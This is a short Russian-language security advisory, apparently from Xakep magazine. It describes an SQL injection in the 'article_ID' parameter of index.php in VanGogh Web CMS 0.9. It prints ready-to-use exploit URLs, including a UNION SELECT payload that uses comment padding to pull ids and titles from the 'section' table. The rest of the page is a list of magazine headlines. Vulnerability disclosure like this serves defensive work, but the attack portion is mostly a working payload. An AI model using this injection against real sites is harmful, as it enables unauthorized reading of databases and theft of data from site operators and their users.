SQL-инъекция в VanGogh Web CMS

Рекомендуем почитать:

Xakep #286. Sad Guard

Программа: VanGogh Web CMS 0.9

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «article_ID» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://[Target]/[vangogh_path]/index.php?article_ID= [SQL Injection]&get_action=article&section=5

http://[Target]/[vangogh_path]/index.php?article_ID=8/**/AND/**/1=2/* */UNION/**/SELECT/**/1,concat(id,0x3a,title),3/**/FROM/*
*/section&get_action=article&section=5

SQL-инъекция в VanGogh Web CMS

Xakep #286. Sad Guard

Последние взломы

Девайс-невидимка. Встраиваемся в локальную сеть с помощью «невидимого» хакерского устройства

HTB Extension. Пентестим плагин для Gitea и сбегаем из Docker

Опасный модем. Закрепляемся в атакованной системе при помощи USB-модема

Поставщик небезопасности. Как Windows раскрывает пароль пользователя

Компьютерные трюки

Мастерская хакера. ИИ-помощники, работа с JSON и приятные мелочи, которые пригодятся в работе

Крококряк. Снимаем трафик с витой пары обычными «крокодилами»

Linux на диете. Уменьшаем требования Bodhi Linux к оперативной памяти

Как писать статьи. Колонка главреда

Свежие новости

Правоохранители создают фейковые сайты для DDoS-атак по найму

Роскомнадзор предлагает использовать оборудование у провайдеров для блокировки средств анонимизации

Популярный YouTube-канал Linus Tech Tips взломали, чтобы рекламировать криптовалютный скам

WordPress принудительно обновляет плагин WooCommerce Payments с 500 000 установок

Мобильный банкер Nexus нацелен на 450 приложений финансовых организаций